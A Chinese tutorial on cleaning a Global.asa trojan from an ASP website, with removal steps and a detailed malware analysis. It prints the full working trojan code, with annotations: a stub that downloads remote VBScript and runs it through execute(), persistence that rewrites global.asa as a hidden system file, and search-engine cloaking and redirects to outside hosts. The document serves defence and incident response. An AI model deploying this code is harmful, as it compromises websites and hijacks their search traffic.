网站中Global.asa木马的快速清除方法_病毒查杀教程-查字典教程网
网站中Global.asa木马的快速清除方法
发布时间:2016-12-21 来源:查字典编辑

解决办法:

1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:/softs/12771.html

2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示:

3、关闭服务器上的缩略图功能 方法参考 /os/windows/Win2003/34960.html

根源:

这次用户中的是下载者类的木马:黑客利用网站的上传漏洞,在网站根目录的foot.asp中插入了以下代码:

代码如下:

<%

'by*aming

' Gethtml(url): performs a server-side HTTP GET for url and returns the
' response body decoded as gb2312 text.
' The request is made by the web server itself, so it shows up as outbound
' HTTP traffic from the server rather than from a visitor's browser.
Function Gethtml(url)

' Server-side HTTP client object.
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

' Third argument False: the call is synchronous.
ObjXMLHTTP.Open "GET",url,False

' The User-Agent header is set to the requested URL itself, which is an
' unusual value and therefore a usable indicator in proxy or egress logs.
ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

' The raw response bytes are held temporarily in the function's return slot.
Gethtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

' The ADODB stream is used only to convert the bytes to text.
set objStream = Server.CreateObject("Adodb.Stream")

' Type 1 = binary stream.
objStream.Type = 1

' Mode 3 = read/write.
objStream.Mode =3

objStream.Open

objStream.Write Gethtml

' Rewind, then reinterpret the same bytes as text.
objStream.Position = 0

' Type 2 = text stream.
objStream.Type = 2

objStream.Charset = "gb2312"

' The decoded text becomes the function's return value.
Gethtml = objStream.ReadText

objStream.Close

set objStream=Nothing

End Function

' Loader stage: each time the page containing this snippet is served, text is
' downloaded from the hard-coded remote URL and run as VBScript via execute().
' The real payload is therefore not stored in this file; only this short stub
' and the 'by*aming marker are on disk, and the remote text can change at any
' time. Review note: treat any execute()/eval() over remotely fetched content,
' and outbound HTTP from the web server process, as indicators of compromise.
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))

%>

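清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示!注意:从下面的代码可以看到,木马还会把自身写入网站根目录的global.asa,并把该文件设置为只读、隐藏、系统属性,因此还需要检查并清理global.asa;同时应修补被利用的上传漏洞,否则木马可能被再次植入。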

xmlasaquan.txt的内容如下:

代码如下:

'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()>

'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.1.2('3:4');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script>

' The two lines above this marker start with an apostrophe, so VBScript treats
' them as comments. Read as HTML they clear the document and send the browser
' to about:blank (meta refresh plus a packed script that decodes to
' window.location.replace('about:blank')).
' NOTE(review): presumably so that opening the payload URL directly in a
' browser shows nothing - confirm.
' The marker below is the string the dropper checks for before writing
' global.asa, and is the signature the article recommends scanning for.
'by*aming

' Raises the script timeout to 600 seconds for the page running this payload.
Server.ScriptTimeout=600

' createasa(Content): persistence step. Overwrites the site's /global.asa with
' Content and then marks the file read-only, hidden and system.
' No return value is assigned.
' Review note: after cleanup, check /global.asa with hidden and system files
' made visible; the attributes set here hide it from a default directory view.
Public Function createasa(ByVal Content)

' All runtime errors in this function are suppressed, so failures are silent.
On Error Resume Next

Set fso = Server.CreateObject("scripting.filesystemobject")

' The physical path of /global.asa is prefixed with "//./".
' NOTE(review): this looks like the Win32 device-path form - confirm.
set f=fso.Getfile("//./" & Server.MapPath("/global.asa"))

' Attributes 0 = normal: clears any read-only/hidden/system flags so the
' existing file can be overwritten.
f.Attributes=0

' The ProgID "adodb.Stream" is assembled from fragments.
' NOTE(review): presumably to avoid plain string matching by scanners - confirm.
Set Obj = Server.CreateObject("adod" & "b.S" & "tream")

' Type 2 = text stream.
Obj.Type = 2

Obj.open

Obj.Charset = "gb2312"

Obj.Position = Obj.Size

' NOTE(review): written as an assignment rather than a method call; whether
' this succeeds cannot be told from here, and any error would be hidden by
' On Error Resume Next above.
Obj.writetext = Content

' Option 2 = create the file or overwrite it if it already exists.
Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2

Obj.Close

Set Obj = Nothing

' 1 + 2 + 4 = ReadOnly + Hidden + System.
f.Attributes=1+2+4

set f=Nothing

Set fso = Nothing

End Function

' GetHtml(url): performs a server-side HTTP GET for url and returns the
' response body decoded as gb2312 text. Same logic as the Gethtml helper in
' the foot.asp stub, except that the stream object is not set to Nothing.
Public Function GetHtml(url)

' Server-side HTTP client object; the request originates from the web server.
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

' Third argument False: the call is synchronous.
ObjXMLHTTP.Open "GET",url,False

' The User-Agent header is set to the requested URL itself.
ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

' Raw response bytes, held temporarily in the return slot.
GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

' The ADODB stream is used only to convert the bytes to text.
set objStream = Server.CreateObject("Adodb.Stream")

' Type 1 = binary stream.
objStream.Type = 1

' Mode 3 = read/write.
objStream.Mode =3

objStream.Open

objStream.Write GetHtml

' Rewind, then reinterpret the same bytes as text.
objStream.Position = 0

' Type 2 = text stream.
objStream.Type = 2

objStream.Charset = "gb2312"

' The decoded text becomes the function's return value.
GetHtml = objStream.ReadText

objStream.Close

End Function

' check(user_agent): returns True when user_agent contains any of the listed
' search-engine crawler names, otherwise False.
' The main script uses this to serve crawlers different content from what
' ordinary visitors receive.
Function check(user_agent)

allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",")

check_agent=false

For agenti=lbound(allow_agent) to ubound(allow_agent)

' InStr is called without a compare argument, so the match is case-sensitive.
If instr(user_agent,allow_agent(agenti))>0 then

check_agent=true

exit for

end if

Next

check=check_agent

End function

' CheckRobot(): returns True when the request's User-Agent contains
' "Baiduspider" or "Googlebot", or when the session flag "ThisCheckRobot" is 1.
' The flag is set by any request carrying the query string admin=1.
' This function is not called anywhere in the listing shown.
Function CheckRobot()

CheckRobot = False

Dim Botlist,i,Repls

Repls = request.ServerVariables("http_user_agent")

' Krobotlist is not in the Dim list above, so it is created implicitly.
Krobotlist = "Baiduspider|Googlebot"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

If InStr(Repls,Botlist(i)) > 0 Then

CheckRobot = True

Exit For

End If

Next

' A request with ?admin=1 sets the session flag, after which every request in
' that session is reported as a robot.
If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1

If Session("ThisCheckRobot") = 1 Then CheckRobot = True

End Function

' CheckRefresh(): returns True when the first 40 characters of the request's
' Referer header contain one of the listed search-engine names, i.e. when the
' visitor appears to have arrived from a search results page.
Function CheckRefresh()

CheckRefresh = False

Dim Botlist,i,Repls

Krobotlist = "baidu|google|sogou|soso|youdao"

Botlist = Split(Krobotlist,"|")

For i = 0 To Ubound(Botlist)

' The length is passed to Left as the string "40".
If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then

CheckRefresh = True

Exit For

End If

Next

End Function

' sleep(): despite its name this routine does not pause. It flushes the
' response buffer if the client is still connected and otherwise ends the
' response.
Sub sleep()

If response.IsClientConnected=true then

Response.Flush

else

response.end

end if

End Sub

' Main body of the downloaded payload. It distinguishes three request types:
'   1. visitors arriving from a search engine (Referer match) are redirected
'      to an external site;
'   2. search-engine crawlers (User-Agent match) are served content fetched
'      from a remote server in place of the real page;
'   3. all other requests re-download the payload and write it to global.asa.
' Review note: because behaviour depends on Referer and User-Agent, a direct
' visit by the site owner can look normal while search traffic is hijacked.

' Case 1: search-engine referral. The site's own host name is appended to the
' redirect URL as the query string.
If CheckRefresh=true Then

cnnbd=lcase(request.servervariables("HTTP_HOST"))

response.redirect("http://www.82767.com/?"&cnnbd&"")

'Response.Write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>")

response.end

end If

user_agent=Request.ServerVariables("HTTP_USER_AGENT")

' Case 2: crawler. The remote response is written out as the page body and the
' request ends there.
if check(user_agent)=true then

' strHost is not assigned anywhere in the listing shown.
' NOTE(review): the domain parameter is therefore presumably empty - confirm.
body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"")

response.write body

response.end

else

' Case 3: persistence. A second remote file is fetched and, only if it carries
' the 'by*aming marker, written over /global.asa by createasa().
asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt")

if instr(asa,"by*aming")>0 then

createasa(asa)

end if

' Rebuild the lower-cased URL of the current request (host + script + query).
ScriptAddress=Request.ServerVariables("SCRIPT_NAME")

namepath=Server.MapPath(ScriptAddress)

If Len(Request.QueryString) > 0 Then

ScriptAddress = ScriptAddress & "?" & Request.QueryString

end if

geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress

geturl =LCase(geturl)

'response.write replace(namepath,server.MapPath("/"),"")

'response.end

'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and

' NOTE(review): geturl is built above as "http://" & host & script path, so the
' second InStr would normally be non-zero and this branch looks unlikely to
' run unless the host header contains upper-case characters - confirm.
if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then

agent = lcase(request.servervariables("http_user_agent"))

' referer and Amll are assigned but not read again in the listing shown.
referer = LCase(Request.ServerVariables("HTTP_REFERER"))

bot = ""

Amll = ""

' User-Agent classification: the first group stores the agent string in bot,
' the second group overrides it with "nobot" for the named engines.
if instr(agent, "+") > 0 then bot = agent

if instr(agent, "-") > 0 then bot = agent

if instr(agent, "http") > 0 then bot = agent

if instr(agent, "spider") > 0 then bot = agent

if instr(agent, "bot") > 0 then bot = agent

if instr(agent, "linux") > 0 then bot = agent

if instr(agent, "baidu") > 0 then bot = agent

if instr(agent, "google") > 0 then bot = "nobot"

if instr(agent, "yahoo") > 0 then bot = "nobot"

if instr(agent, "msn") > 0 then bot = "nobot"

if instr(agent, "alexa") > 0 then bot = "nobot"

if instr(agent, "sogou") > 0 then bot = "nobot"

if instr(agent, "youdao") > 0 then bot = "nobot"

if instr(agent, "soso") > 0 then bot = "nobot"

if instr(agent, "iask") > 0 then bot = "nobot"

' The body of this branch is commented out, so the classification above has
' no visible effect in this version of the payload.
if bot="nobot" then

'Call WriteErr

'response.end

end if

Call sleep()

end if

end if

'</body></html>
